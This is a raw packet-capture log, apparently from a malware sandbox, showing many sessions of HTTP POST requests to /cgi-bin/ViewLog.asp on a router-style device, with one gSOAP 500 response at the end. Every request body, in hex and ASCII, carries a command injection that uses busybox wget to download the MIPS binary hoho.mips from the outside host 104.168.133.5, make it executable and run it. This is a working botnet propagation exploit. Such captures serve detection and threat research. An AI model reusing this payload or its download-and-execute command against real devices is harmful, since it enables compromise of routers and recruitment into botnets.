                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.714121103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:48.770152092 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.106029034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.457912922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.905441046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.592796087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              513192.168.2.144118662.195.28.1418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.700242043 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:48.334172010 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:48.966183901 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              514192.168.2.144156294.120.13.1928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.716118097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              515192.168.2.143943894.120.25.1398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.717012882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              516192.168.2.144111862.29.124.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.724055052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              517192.168.2.144376494.121.104.1428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.162800074 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              518192.168.2.145791294.120.255.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.162875891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              519192.168.2.145857831.132.79.118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.546540022 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              520192.168.2.144360494.122.66.1618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.592931032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              521192.168.2.145966894.123.242.2388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.597011089 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              522192.168.2.143769231.200.118.18080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.620389938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.954035997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.522165060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.689830065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.089572906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.633028984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              523192.168.2.144290285.97.191.1158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.620431900 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.954051971 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.194545984 CET791INHTTP/1.1 500 Internal Server Error
                                              Server: gSOAP/2.7
                                              Content-Type: text/xml; charset=utf-8
                                              Content-Length: 589
                                              Connection: close
